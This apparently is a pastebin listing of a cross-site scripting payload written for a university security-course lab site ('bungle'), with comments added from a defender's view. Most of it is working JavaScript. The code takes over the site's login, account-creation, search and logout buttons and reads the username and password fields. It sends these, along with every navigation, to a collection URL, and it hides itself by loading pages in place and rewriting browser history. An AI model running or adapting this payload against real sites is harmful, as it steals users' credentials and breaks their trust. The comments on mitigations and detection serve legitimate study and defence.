
Untitled

a guest
Oct 12th, 2018
  /*
   * payload(attacker): script written to run inside a page of the `target`
   * site; how it gets into that page is not shown in this listing.
   * It reports login, logout, account-creation, search and navigation events,
   * including the values of the #username and #userpass fields, to the
   * `attacker` URL. It also replaces the site's normal navigation with in-page
   * loads, so the document (and presumably this script) is never unloaded.
   *
   * Defender's view: the credentials are read from form fields in the DOM, so
   * cookie flags such as HttpOnly do not protect them. The controls that matter
   * are output encoding of any user input echoed into the page and a
   * Content-Security-Policy that disallows injected script and restricts the
   * origins the page may send requests to.
   *
   * @param attacker  URL that receives each event as GET query parameters.
   */
  1. function payload(attacker)
  2. {
  // Base URL written into the address bar and history entries below.
  3. var target = "http://bungle-cs461.cs.illinois.edu/";
  // Sends one event object to `attacker` via a jQuery GET and echoes it to the console.
  // With GET the fields travel in the query string, so egress/proxy logs showing
  // `event=`, `user=` and `pass=` parameters to a foreign host are a detection point.
  4. function log(data)
  5. {
  6. console.log($.param(data))
  7. $.get(attacker, data);
  8. }
  // Builds the event object for a given type code:
  //   "i" -> login, "o" -> logout, "c" -> create_account, anything else -> nav.
  // `url` is only used for the nav event.
  9. function constructEvent(type, url)
  10. {
  11. if(type == "i")
  12. {
  // Username/Password are assigned without a declaration; unless they are declared
  // elsewhere this creates globals that keep the plaintext values reachable from `window`.
  13. Username = $("#username").val();
  14. Password = $("#userpass").val();
  15. return {event:"login",user:Username,pass:Password};
  16. }
  17. else if(type == "o")
  18. {
  19. return {event:"logout",user:($("#logged-in-user").text())};
  20. }
  21. else if(type == "c")
  22. {
  23. Username = $("#username").val();
  24. Password = $("#userpass").val();
  25. return {event:"create_account",user:Username,pass:Password};
  26. }
  27. else
  28. {
  // The user name is attached only when the #logged-in-user element has text.
  29. if($("#logged-in-user").text() != "")
  30. {
  31. return {event:"nav",user:String($("#logged-in-user").text()),url:url}
  32. }
  33. else
  34. {
  35. return {event:"nav",url:url};
  36. }
  37. }
  38. }
  // Fetches `href` with jQuery .load() and puts the response into the <html> element,
  // then runs clearHistory() and un-hides the page. `data` is forwarded to .load()
  // unless it is the empty string.
  39. function proxy(href,data)
  40. {
  41. if(data == "")
  42. {
  43. $("html").load(href, function(){
  44. clearHistory();
  45. $("html").show();
  46. });
  47. }
  48. else
  49. {
  50. $("html").load(href, data, function(){
  51. clearHistory();
  52. $("html").show();
  53. });
  54. }
  55. }
  // Click handler for #search-btn: cancels the default action, reports a nav event
  // carrying the search URL, records a history entry under `target`, and loads the
  // results in-page.
  56. function hijackSearchButton(event)
  57. {
  58. event.preventDefault();
  59. searchQuery = $("#query").val();
  60. searchEvent = {event: "search",q:encodeURIComponent(searchQuery)}
  61. log(constructEvent("","search?q="+searchQuery));
  62. history.pushState({type: "search",url:target+"search?q="+encodeURIComponent(searchQuery)},"",target+"search?q="+encodeURIComponent(searchQuery));
  63. reload("search?q="+encodeURIComponent(searchQuery), "");
  64. }
  // Click handler for #log-out-btn: reports the logout event, then requests "logout" in-page.
  65. function hijackLogOutButton(event)
  66. {
  67. event.preventDefault();
  68. log(constructEvent("o",""));
  69. history.pushState({type:"logout",url:target},"",target);
  70. reload("logout",{});
  71. }
  // Click handler for #log-in-btn: the field values are reported to `attacker` first,
  // then the same values are submitted to "login" so the sign-in still goes through.
  72. function hijackLogInButton(event)
  73. {
  74. event.preventDefault();
  75. Username = $("#username").val();
  76. Password = $("#userpass").val();
  77. log(constructEvent("i",""));
  78. history.pushState({type:"logout",url:target},"",target);
  79. reload("login",{username:Username,password:Password});
  80. }
  // Click handler for #new-account-btn: same pattern as the login handler, submitting to "create".
  81. function hijackCreateAccountButton(event)
  82. {
  83. event.preventDefault();
  84. Username = $("#username").val();
  85. Password = $("#userpass").val();
  86. log(constructEvent("c",""));
  87. history.pushState({type:"logout",url:target},"",target);
  88. reload("create",{username:Username,password:Password});
  89. }
  // Click handler for #search-again-btn: reports a nav event for "./" and loads it in-page.
  90. function hijackSearchAgainButton(event)
  91. {
  92. event.preventDefault();
  93. log(constructEvent("","./"));
  94. history.pushState({type: "again",url:target},"",target);
  95. reload("./","");
  96. }
  // Removes every <a> element whose text contains "function" or "String".
  // NOTE(review): presumably this hides links that would display the injected script
  // text to the user; the page markup is not shown here, so confirm against the site.
  97. function clearHistory()
  98. {
  99. $("a").filter(":contains(\"function\")").remove();
  100. $("a").filter(":contains(\"String\")").remove();
  101. }
  // Hides the document, then loads `newLink` through proxy(), which shows it again.
  102. function reload(newLink,data)
  103. {
  104. $("html").hide();
  105. proxy(newLink,data);
  106. }
  // Start-up: rewrite the current history entry's URL to `target`, load the home page
  // in-page, and report the first nav event.
  107. history.replaceState({type: "home",url:target},"",target);
  108. reload("./","");
  109. log(constructEvent("","./"));
  // Delegated handlers are bound on `document`, so they keep applying to buttons
  // that arrive with later in-page loads.
  110. $(document).ready(function()
  111. {
  112. $(document).on("click","#search-btn",hijackSearchButton);
  113. $(document).on("click","#log-out-btn",hijackLogOutButton);
  114. $(document).on("click","#log-in-btn",hijackLogInButton);
  115. $(document).on("click","#new-account-btn",hijackCreateAccountButton);
  116. $(document).on("click","#search-again-btn",hijackSearchAgainButton);
  117. });
  // Back/forward navigation: load the URL stored in the history state in-page
  // instead of letting the browser leave the document.
  118. window.onpopstate = function(event)
  119. {
  120. if(event.state.type == "search" || event.state.type == "home" || event.state.type == "logout" || event.state.type == "again")
  121. {
  122. reload(event.state.url,"");
  123. }
  124. else if(event.state.type == "login")
  125. {
  126. reload(event.state.url,{});
  127. }
  128. };
  // The collection endpoint is a loopback address, i.e. a listener on the same
  // machine as the browser (consistent with a lab exercise; TODO confirm).
  129. };payload("http://127.0.0.1:31337/stolen");